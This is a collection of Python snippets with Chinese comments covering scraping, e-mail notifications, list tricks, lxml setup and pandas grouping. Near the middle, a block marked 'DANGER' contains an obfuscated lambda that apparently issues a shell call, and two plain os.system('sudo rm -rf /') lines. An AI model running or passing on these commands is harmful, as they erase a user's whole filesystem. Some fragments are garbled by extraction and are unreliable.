import requests
# https://zhuanlan.zhihu.com/p/20091394
# Upload a local photo to how-old.net and print the raw analysis response.
s = requests.session()
url = 'http://how-old.net/Home/Analyze?isTest=False&source=&version=001'
header = {
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0",
    'Host': "how-old.net",
    'Referer': "http://how-old.net/",
    'X-Requested-With': "XMLHttpRequest"
}
# Open the jpg in a context manager so the handle is closed after the upload
# (the original left the file object dangling), and use print() (py3).
with open('test.jpg', 'rb') as fp:
    r = s.post(url, files={'file': fp}, headers=header)
print(r.content)
# Demonstrate that copying a list is *shallow*: the nested list object is
# shared between the copy and the original.
a = [0, 1, 2, 3, [4, 5, 6], 7]
b = list(a)          # shallow copy, same effect as a[:]
a[0] = 5             # rebinding a top-level slot does not affect b
a[4][0] = 99         # mutating the shared inner list shows up in both
print(a)
print(b)
# The ids show a and b still reference the very same element objects.
print([id(x) for x in a])
print([id(x) for x in b])
# encoding:utf-8
# Fetch NetEase's national-news JSON feed and strip the JS variable wrapper.
import urllib.request
import re
import json

url = 'http://news.163.com/special/00014RJU/nationalnews-json-data.js'
result = urllib.request.urlopen(url).read().strip()
# [\s\S] also matches newlines, which a plain .* would not; the original
# compiled a dead .*-based pattern first and immediately overwrote it.
# urlopen() yields bytes in Python 3, so the pattern is a bytes pattern.
pattern = re.compile(rb';var newsList=([\s\S]*)')
matchs = pattern.match(result)
print(matchs.group())
#coding:gbk
from filecmp import dircmp
def show_diff_files(dcmp):
    """Recursively print every file that differs between the two sides of *dcmp*.

    *dcmp* is a filecmp.dircmp result; subdirectories are walked depth-first.
    (Converted from the Python 2 print statement used elsewhere in this file.)
    """
    for name in dcmp.diff_files:
        print("diff_file %s found in %s and %s" % (name, dcmp.left, dcmp.right))
    for sub_dcmp in dcmp.subdirs.values():
        show_diff_files(sub_dcmp)
def show_only(dcmp):
    """Recursively print entries that exist on only one side of *dcmp*.

    Iterating an empty list is a no-op, so the original's truthiness guards
    are unnecessary; the original also set an unused local `ave_rst` (dropped).
    """
    for i in dcmp.left_only:
        print("%s只存在于%s中" % (i, dcmp.left))
    for i in dcmp.right_only:
        print("%s只存在于%s中" % (i, dcmp.right))
    for sub_dcmp in dcmp.subdirs.values():
        show_only(sub_dcmp)
def compare(dir1, dir2):
    """Compare two directory trees, reporting differing files and
    entries that exist on one side only."""
    comparison = dircmp(dir1, dir2)
    show_diff_files(comparison)
    show_only(comparison)
from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr, formataddr
from time import sleep
from bs4 import BeautifulSoup
import requests
import smtplib
import time
def SendMessage(title):  # send a reminder e-mail
    """Send *title* as the plain-text body of a reminder mail via 163.com SMTP.

    Returns None (the module-level print below therefore prints None).
    """
    def _format_addr(s):
        # Encode the display name so non-ASCII survives in the header.
        name, addr = parseaddr(s)
        return formataddr((Header(name, 'utf-8').encode(), addr))
    from_addr = 'xxx@163.com'     # sender mailbox
    password = 'xxxx'             # mailbox password (NOTE(review): hard-coded credential)
    to_addr = 'xxx@163.com'       # recipient mailbox
    smtp_server = 'smtp.163.com'  # make sure SMTP is enabled on the account
    msg = MIMEText(title, 'plain', 'utf-8')
    msg['From'] = _format_addr('邮件提醒 <%s>' % from_addr)
    msg['To'] = _format_addr('亲爱的 <%s>' % to_addr)
    msg['Subject'] = Header('邮件提醒更新', 'utf-8').encode()
    server = smtplib.SMTP(smtp_server, 25)
    try:
        server.set_debuglevel(1)
        server.login(from_addr, password)
        server.sendmail(from_addr, [to_addr], msg.as_string())
    finally:
        # Always close the connection, even when login/send raises
        # (the original leaked it on any SMTP error).
        server.quit()
print(SendMessage('hello'))
import sys, Image  # old-style PIL import; modern Pillow uses `from PIL import Image`
# Crude skin-tone heuristic (Python 2): convert the image to YCbCr, count
# pixels whose chroma falls inside an empirical "skin" box, and flag the
# image when more than 30% of all pixels look like skin.
img = Image.open(sys.argv[1]).convert('YCbCr')
w, h = img.size
data = img.getdata()
cnt = 0
for i, ycbcr in enumerate(data):
    y, cb, cr = ycbcr
    # NOTE(review): the Cb/Cr bounds are empirical skin-tone thresholds — confirm source.
    if 86 <= cb <= 117 and 140 <= cr <= 168:
        cnt += 1
print '%s %s a porn image.'%(sys.argv[1], 'is' if cnt > w * h * 0.3 else 'is not')
>>> echo \'{\"key\":\"value\"}\' | python -m json.tool
{
\"key\": \"value\"
}
//python -m json.tool
//在 vim 中执行这句代码,可以快速格式化 json 数据
curl -L http://restapi/json_response | python -m json.tool
python -c \"import socket; sock=socket.create_connection((\'ns1.dnspod.net\',6666)); print sock.recv(16); sock.close()\"
$ python -c \"print(\' \'.join([str(i) for i in range(1,10000)]))\" | say
import re; from collections import Counter; Counter(re.findall(r'\w+', open('hamlet.txt').read().lower())).most_common(100)
m = [[1, 2], [3, 4]]; zip(*m)
import antigravity就会打开 xkcd.com/about/
sum(map(int, str(2**1000)))
filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, n))
a=[3, 8, 9, 4, 1, 10, 6, 7, 2, 5]
[a[i:i+3] for i in xrange(0,len(a),3)]
结果[[3, 8, 9], [4, 1, 10], [6, 7, 2], [5]]
m = {\'a\': 1, \'b\': 2, \'c\': 3, \'d\': 4}
{v: k for k, v in m.items()}
结果:{1: \'a\', 2: \'b\', 3: \'c\', 4: \'d\'}
a = [1, 2, [3, 4], [[5, 6], [7, 8]]]
flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x]
flatten(a);
结果:[1,2,3,4,5,6,7,8]
python -m SimpleHTTPServer 8000,然后浏览器打开 localhost:8000,一个简易的web服务就开启了
print('\n'.join([' '.join(['%s*%s=%-2s' % (y, x, x * y) for y in range(1, x + 1)]) for x in range(1, 10)]))
print(*(i for i in range(2, 1000) if all(tuple(i % j for j in range(2, int(i**.5) + 1)))))  # +1 so perfect squares like 9 and 25 are not reported as prime
print [x[0] for x in [ (a[i][0], a.append((a[i][1], a[i][0]+a[i][1]))) for a in ([[1,1]], ) for i in xrange(100) ]]
import requests
import urllib.request  # the original's bare `import urllib` does not expose urllib.request

# Batch-download the first tracks of a NetEase Cloud Music chart.
# Other charts / playlists (swap in the id you want):
# r = requests.get('http://music.163.com/api/playlist/detail?id=2884035')   # 网易原创歌曲榜
# r = requests.get('http://music.163.com/api/playlist/detail?id=19723756')  # 云音乐飙升榜
# r = requests.get('http://music.163.com/api/playlist/detail?id=3778678')   # 云音乐热歌榜
r = requests.get('http://music.163.com/api/playlist/detail?id=3779629')     # 云音乐新歌榜
arr = r.json()['result']['tracks']  # the chart holds 100 tracks
for i in range(10):  # number of tracks to download, 1..100
    name = str(i + 1) + ' ' + arr[i]['name'] + '.mp3'
    link = arr[i]['mp3Url']
    # The target folder 网易云音乐 must exist beforehand.
    urllib.request.urlretrieve(link, '网易云音乐\\' + name)
    print(name + ' 下载完成')
import webbrowser

# Sites to open in the default browser, one tab each.
urls = [
    'http://www.douban.com',
    'http://weibo.com',
    'http://www.zhihu.com',
    'http://www.v2ex.com/',
    'https://github.com/',
    'https://mail.google.com/',
    'http://instagram.com/',
]
# Plain loop instead of map(): in Python 3 map() is lazy, so the original
# built an iterator and never actually opened any page.
for u in urls:
    webbrowser.open(u)
# -*- coding: utf-8 -*-
# Scrape the Amazon Kindle daily-deal page and mail the two featured books.
import requests
from bs4 import BeautifulSoup
import smtplib
from email.mime.text import MIMEText
from email.header import Header  # fixed: the Python 3 module is lowercase `email.header`

# Scraped fields for the two featured deal books; filled by parse().
result = {"name": [], "cover": [], "desc": [], "link": [], "price": []}

def get_page():
    """Fetch the Kindle daily-deal page and return its HTML text."""
    return requests.get("http://t.cn/Rvm4xgc").text
def parse(html):
    """Pull the two featured books (name, cover, link, desc, price) out of the
    deal-page HTML into the module-level `result` dict.

    NOTE(review): tightly coupled to the page layout — table index 6, fixed
    row/cell offsets — so any page redesign silently breaks the scraping.
    BeautifulSoup is called without an explicit parser (uses the default).
    """
    soup = BeautifulSoup(html)
    table = soup.body.find_all("table")[6]
    # Row 1 holds both book titles, in cells 0 and 2.
    name = table.find_all("tr")[1]
    result["name"].append(name.find_all("td")[0].b.string)
    result["name"].append(name.find_all("td")[2].b.string)
    # Row 2 holds cover / link / description / price for each book.
    desc = table.find_all("tr")[2]
    book_1 = desc.find_all("td")[0]
    result["cover"].append(book_1.a.img["src"])
    result["link"].append("http://www.amazon.cn" + book_1.a["href"])
    result["desc"].append(book_1.contents[1])
    result["price"].append(book_1.find_all("p")[1].b.span.string)
    book_2 = desc.find_all("td")[2]
    result["cover"].append(book_2.a.img["src"])
    result["link"].append("http://www.amazon.cn" + book_2.a["href"])
    result["desc"].append(book_2.contents[1])
    result["price"].append(book_2.find_all("p")[1].b.span.string)
# SMTP account settings for the notification mail.
mail_config = {
    "from": "gitradar@163.com",
    "to": "liushuaikobe1993@163.com",
    "server": "smtp.163.com",
    "username": "gitradar",
    "pwd": "yourpassword"  # NOTE(review): hard-coded credential placeholder
}

def send_mail(sbj, content, from_whom=mail_config['from'], to_whom=mail_config['to'], server=mail_config['server'],
              username=mail_config['username'], pwd=mail_config['pwd']):
    """Send *content* as an HTML mail with subject *sbj* over STARTTLS.

    All connection parameters default to `mail_config`, so callers normally
    pass just (sbj, content).
    """
    msg = MIMEText(content, "html", "utf-8")
    msg['Subject'] = Header(sbj, "utf-8")
    msg['From'] = from_whom
    msg['To'] = to_whom
    s = smtplib.SMTP(server)
    try:
        s.ehlo()
        s.starttls()
        s.login(username, pwd)
        s.sendmail(from_whom, to_whom, msg.as_string())
    finally:
        s.quit()  # the original never closed the SMTP session
def build_html():
    """Assemble the notification-mail HTML body from the scraped `result` dict.

    NOTE(review): the original body was garbled by extraction (stray %20
    escapes, stripped tags, unterminated string literals). This is a
    reconstruction that renders each book's name/price heading, cover image,
    and description, which is what the surviving fragments concatenated.
    """
    parts = []
    for idx in range(2):
        parts.append('<h3><a href="%s">%s</a> %s</h3>' %
                     (result["link"][idx], result["name"][idx], result["price"][idx]))
        parts.append('<img src="%s"/>' % result["cover"][idx])
        parts.append('<p>%s</p>' % result["desc"][idx])
    return ''.join(parts)
if __name__ == "__main__":
    # Scrape today's deals, render the mail body, and send it out.
    parse(get_page())
    send_mail("Kindle今日特价书", build_html())
# ASCII heart filled with the text "PYTHON!", sampled from the implicit heart
# curve (x^2 + y^2 - 1)^3 - x^2 * y^3 <= 0 on a 60x30 grid.
# (Converted from the Python 2 print statement to the print() function.)
print('\n'.join([''.join([('PYTHON!'[(x - y) % 7] if ((x * 0.05) ** 2 + (y * 0.1) ** 2 - 1) ** 3 - (x * 0.05) ** 2 * (y * 0.1) ** 3 <= 0 else ' ') for x in range(-30, 30)]) for y in range(15, -15, -1)]))
THON!PYTH YTHON!PYT
!PYTHON!PYTHON!PY N!PYTHON!PYTHON!P
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!P
!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PY
PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYT
YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH
THON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHO
HON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!
ON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
YTHON!PYTHON!PYTHON!PYTHON!PYTHON
ON!PYTHON!PYTHON!PYTHON!PYTHO
PYTHON!PYTHON!PYTHON!PYTH
HON!PYTHON!PYTHON!PYT
PYTHON!PYTHON!P
ON!PYTHON
YTH
H
import zipfile

try:
    # Extract a password-protected archive into the current directory.
    with zipfile.ZipFile('1.zip') as zFile:
        zFile.extractall(path='./', pwd=b'1314')
        print('Extract the Zip file successfully!')
except (OSError, RuntimeError, zipfile.BadZipFile):
    # Narrowed from a bare except: a missing file (OSError), a wrong
    # password (RuntimeError) or a corrupt archive (BadZipFile) are the
    # expected failure modes; anything else should propagate.
    print('Extract the Zip file failed!')
In [1]: isinstance(1, (int, long, float))
True
In [2]: isinstance(\'a\', (int, long, float))
False
In [1]: foo = \'123.456\'
In [2]: foo.replace(\'.\', \'\', 1).isdigit()
True
In [3]: bar = \'12.34.56\'
In [4]: bar.replace(\'.\', \'\', 1).isdigit()
False
def input_num():
    """Prompt until the user types something numeric; returns the raw string.

    Accepts anything that is all digits after removing at most one '.',
    so '123' and '123.456' pass while '12.34.56' keeps prompting.
    (Python 2 `raw_input`; under Python 3 this would be `input`.)
    """
    while True:
        num = raw_input('input a number : ')
        if num.replace('.', '', 1).isdigit():
            return num
>>> f = 1.0
>>> f.is_integer()
True
>>> f = 1.0 / 3 + 2.0 / 3
>>> f.is_integer()
True
try:
f = float(input_value)
except Exception:
...
else:
# Is it a integer?
if f.is_integer():
...
else:
1. 安装wheel,命令行运行:
pip install wheel
2.在http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml 这里下载对应的.whl文件,注意别改文件名!
Ctrl + F,输入lxml,找到下面这段
Lxml, a binding for the libxml2 and libxslt libraries.
lxml‑3.4.4‑cp27‑none‑win32.whl
lxml‑3.4.4‑cp27‑none‑win_amd64.whl
lxml‑3.4.4‑cp33‑none‑win32.whl
lxml‑3.4.4‑cp33‑none‑win_amd64.whl
lxml‑3.4.4‑cp34‑none‑win32.whl
lxml‑3.4.4‑cp34‑none‑win_amd64.whl
lxml‑3.4.4‑cp35‑none‑win32.whl
lxml‑3.4.4‑cp35‑none‑win_amd64.whl
cp后面是Python的版本号,27表示2.7,根据你的Python版本选择下载。
3. 进入.whl所在的文件夹,执行命令即可完成安装
pip install 带后缀的完整文件名
$ pip install lxml-3.6.4-cp35-cp35m-win32.whl
Processing .\\lxml-3.6.4-cp35-cp35m-win32.whl
Installing collected packages: lxml
Successfully installed lxml-3.6.4
http://stackoverflow.com/questions/29440482/how-to-install-lxml-on-windows
http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-bat
# DANGER: the lines below are destructive "joke" one-liners — do NOT run them.
# The obfuscated lambda appears to decode module/attribute names from a long
# integer via hex() and call them — presumably an os.system-style shell call
# (Python 2 only: it uses `long`). Left here as a cautionary example.
(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True))
import os
os.system('sudo rm -rf /')  # DANGER: attempts to delete the entire filesystem
__import__('os').system('sudo rm -rf /')  # same, without a visible import
from selenium import webdriver
import time

# Automate a cnblogs.com login with Selenium and report whether it worked.
browser = webdriver.Chrome()
browser.get("http://cnblogs.com")
time.sleep(1)  # crude fixed waits; WebDriverWait would be more robust
browser.find_element_by_link_text("登录").click()
time.sleep(1)
browser.find_element_by_id("input1").send_keys("用户名")
browser.find_element_by_id("input2").send_keys("密码")
browser.find_element_by_id("signin").click()
time.sleep(1)
try:
    # A visible "退出" (logout) link means the session is authenticated.
    if browser.find_element_by_link_text("退出"):
        print("Login Successfully.")
except Exception:  # narrowed from a bare except (which also swallowed SystemExit)
    print("Login failed.")
from selenium import webdriver

# Scrape a Huaban board with headless PhantomJS, spoofing browser headers.
# NOTE(review): PhantomJS support was removed from modern Selenium; headless
# Chrome/Firefox is the current replacement.
source_url='http://huaban.com/boards/28195582/'
headers={
    'Host':'huaban.com',
    'Pragma':'no-cache',
    'Cache-Control':'no-cache',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36',
    'Cookie':'xxxxxx'
}
cap = webdriver.DesiredCapabilities.PHANTOMJS
cap["phantomjs.page.settings.userAgent"] = headers['User-Agent']  # spoof request User-Agent
cap["phantomjs.page.settings.loadImages"] = False  # skip image loading for speed
cap["phantomjs.page.customHeaders.Host"]=headers['Host']
cap["phantomjs.page.customHeaders.Pragma"]=headers['Pragma']
cap["phantomjs.page.customHeaders.Cookie"]=headers['Cookie']
driver = webdriver.PhantomJS(desired_capabilities=cap)
driver.get(source_url)
echo \”u00e8u0091u0089u00e7u008au00b6u00e3u0083u00a2u00e3u0083u008eu00e3u0083u009du00e3u0083u00bcu00e3u0083u00abu00e3u0082u00a2u00e3u0083u00b3u00e3u0083u0086u00e3u0083u008a\”
x = u'\u00e8\u0091\u0089'
print x
# NOTE(review): this `doc` appears to have originally contained real HTML
# tags (e.g. <p id="p1">, <a id="a1">) that were stripped during extraction —
# as written, get_element_by_id("a1") will raise KeyError because no element
# with that id survives. Confirm against the original article.
doc = '''
The Dormouse's story
p1p1p1
b1b1b1
p2p2p2
p4p4p4
'''
from lxml import html
tree = html.fromstring(doc)
a = tree.get_element_by_id("a1")
print(html.tostring(a))
print(html.tostring(tree).decode())
def dropnode(e=None):
    """Strip everything that follows *e* in document order.

    Walks from *e* up to (but not past) the <body> element, dropping every
    following sibling at each level, so only content up to and including *e*
    survives. No-op for e=None.
    """
    node = e
    while node is not None and node.tag != 'body':
        sibling = node.getnext()
        while sibling is not None:
            sibling.drop_tree()
            sibling = node.getnext()
        node = node.getparent()
dropnode(a)
print(html.tostring(tree).decode())
import requests
from bs4 import BeautifulSoup

# Download the site logo image referenced on the front page.
r = requests.get("http://www.pythonscraping.com")
bs = BeautifulSoup(r.text, 'lxml')
image = bs.find("a", {"id": "logo"}).find("img")["src"]
ir = requests.get(image)
if ir.status_code == 200:
    # Context manager closes the file; the original left the handle open.
    with open('logo.jpg', 'wb') as f:
        f.write(ir.content)
# NOTE(review): exact duplicate of the preceding snippet — kept in place,
# but a candidate for removal.
import requests
from bs4 import BeautifulSoup

r = requests.get("http://www.pythonscraping.com")
bs = BeautifulSoup(r.text, 'lxml')
image = bs.find("a", {"id": "logo"}).find("img")["src"]
ir = requests.get(image)
if ir.status_code == 200:
    # Context manager closes the file; the original left the handle open.
    with open('logo.jpg', 'wb') as f:
        f.write(ir.content)
import lxml.etree
import urllib.request
from lxml.etree import *  # NOTE(review): wildcard import is unused below and worth removing

# Fetch one PubMed record as XML and read the journal title out of it.
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=26693255&retmode=text&rettype=xml'
request = urllib.request.Request(str_url)
xml_text = urllib.request.urlopen(request).read()
root = lxml.etree.XML(xml_text)  # xml_text is the raw XML document bytes
# Example: get the journal name (and ISSN).
# With .find() on plain tag names you must descend level by level:
journal_name = root.find('PubmedArticle').find('MedlineCitation').find('Article').find('Journal').find('Title').text
# .find() also accepts a relative XPath (must start with .//);
# for absolute paths use the xpath() method instead:
journal_name = root.find('.//Title').text
print('xpath:' ,journal_name)
journal_name = root.xpath('//Title')[0].text
print(journal_name)
import lxml.html

# Scrape the Douban movies front-page billboard with CSS selectors.
# (Relies on urllib.request imported by the previous snippet.)
str_url = 'http://movie.douban.com/'
request = urllib.request.Request(str_url)
html_text = urllib.request.urlopen(request).read()
root = lxml.html.fromstring(html_text)
# cssselect() returns a list of all matches and takes jQuery-like CSS selectors.
movies_list = [a.text for a in root.cssselect('div.billboard-bd tr td a')]
print(movies_list)
# And every movie's hyperlink:
movies_href = [a.get('href') for a in root.cssselect('div.billboard-bd tr td a')]
print(movies_href)
n=7
list1=[\'a\',\'b\',\'c\',\'d\']
print((list1 * (n // len(list1) + 1))[:n])
(list1 * 2)[:n]
import itertools
import math
(list1 * math.ceil( n / len(list1) ) )[:7]
n=7
list1=[\'a\',\'b\',\'c\',\'d\']
print list(itertools.islice(itertools.cycle(list1), 0, n))
pip install wheel
http://www.lfd.uci.edu/~gohlk… 下载对应版本的 lxml和Twisted,cp后面是Python的版本号,27表示2.7 pip install 对应的whl文件
pip install scrapy
list(set(list2)-set(list1))
eval('[1,2,3,4]')
[1, 2, 3, 4]
json.loads(str)
ast.literal_eval(str)
raw = b'{"aa":11,"bb":22,"cc":33}'
d = json.loads(str(raw, 'utf-8'))
d = eval(b'{"aa":11,"bb":22,"cc":33}')
s = b'{"aa":11,"bb":22,"cc":33}'.decode('utf-8')  # decode the bytes to str first
data = json.loads(s)  # then parse into a dict
# Bucket the values 1..11999 into four inclusive ranges and total each bucket.
a_part = [2001, 12000]
b_part = [1001, 2000]
c_part = [11, 1000]
d_part = [1, 10]
data = range(1, 12000)
labels = [a_part, b_part, c_part, d_part]
sizes = []
for part in labels:
    # Use a local name instead of shadowing the builtin `sum` — the original
    # rebound `sum` to an int here, which made the builtin sum() calls in the
    # one-liners below raise TypeError.
    total = 0
    for each in data:
        total += each if each >= part[0] and each <= part[1] else 0
    sizes.append(total)
print(sizes)
# Two increasingly compact equivalents of the loop above:
sizes = [sum(each for each in data if part[0] <= each <= part[1]) for part in labels]
sizes = [sum(x for x in data if low <= x <= high) for low, high in labels]
import smtplib
from email.mime.text import MIMEText

# Send a plain-text test mail over SMTP-SSL. (The original paste had its
# quotes mangled into typographic “smart quotes”; normalized back to ASCII.)
mail_host = "smtp.163.com"          # SMTP server
mail_user = "username"              # account name
mail_pass = "passwd"                # password
sender = 'user@163.com'             # sender address (use the full address or login may fail)
receivers = ['to_someone@qq.com']   # recipients, e.g. a QQ mailbox
content = '过期教程害死人!'
title = 'Python SMTP Mail Test'     # subject
message = MIMEText(content, 'plain', 'utf-8')  # body, subtype, charset
message['From'] = "{}".format(sender)
message['To'] = ",".join(receivers)
message['Subject'] = title
try:
    smtpObj = smtplib.SMTP_SSL(mail_host, 465)  # SSL from the start; port is usually 465
    smtpObj.login(mail_user, mail_pass)
    smtpObj.sendmail(sender, receivers, message.as_string())
    smtpObj.quit()  # close the session (the original leaked the connection)
    print("mail has been send successfully.")
except smtplib.SMTPException as e:
    print(e)
###pip UnicodeDecodeError: \'ascii\' codec can\'t decode byte 0xc0 in position 0
vi mimetypes.py
import sys
reload(sys)
sys.setdefaultencoding('utf-8')  # Python 2-only hack; avoid in new code
### Run a command from Python (shell=True passes it through the shell)
from subprocess import run
run("ping 127.0.0.1", shell=True)
import pandas as pd

# Group ticket rows by serial number (流水号) and join each ticket's handlers
# (处理人) into one comma-separated string. (Smart quotes in the original
# paste normalized back to ASCII.)
cols = ['流水号', '处理人', '处理时间']
data = [[10000, '张三', '2016-10-01'],
        [10000, '李四', '2016-10-02'],
        [10001, '王五', '2016-10-01'],
        [10002, '赵六', '2016-10-03'],
        [10001, '黄七', '2016-10-02'],
        [10000, '吴八', '2016-10-03']]
df = pd.DataFrame(data, columns=cols)
# NOTE(review): building from set() makes both the row order and the join
# order of handlers non-deterministic; the groupby version below is cleaner.
grp = [(n, ','.join([r for r in set(df[df['流水号'] == n]['处理人'])]))
       for n in set(df['流水号'])]
df2 = pd.DataFrame(grp, columns=cols[:-1])
print(df)
print(df2)
# The same grouping via groupby: deterministic (keeps row order within each
# group) and far simpler. (Smart quotes normalized back to ASCII.)
cols = ['流水号', '处理人', '处理时间']
data = [[10000, '张三', '2016-10-01'],
        [10000, '李四', '2016-10-02'],
        [10001, '王五', '2016-10-01'],
        [10002, '赵六', '2016-10-03'],
        [10001, '黄七', '2016-10-02'],
        [10000, '吴八', '2016-10-03']]
frame = pd.DataFrame(data, columns=cols)
def combination(names):
    """Join one group's values into a single comma-separated string."""
    return ','.join(names)
frame.groupby('流水号').aggregate(combination)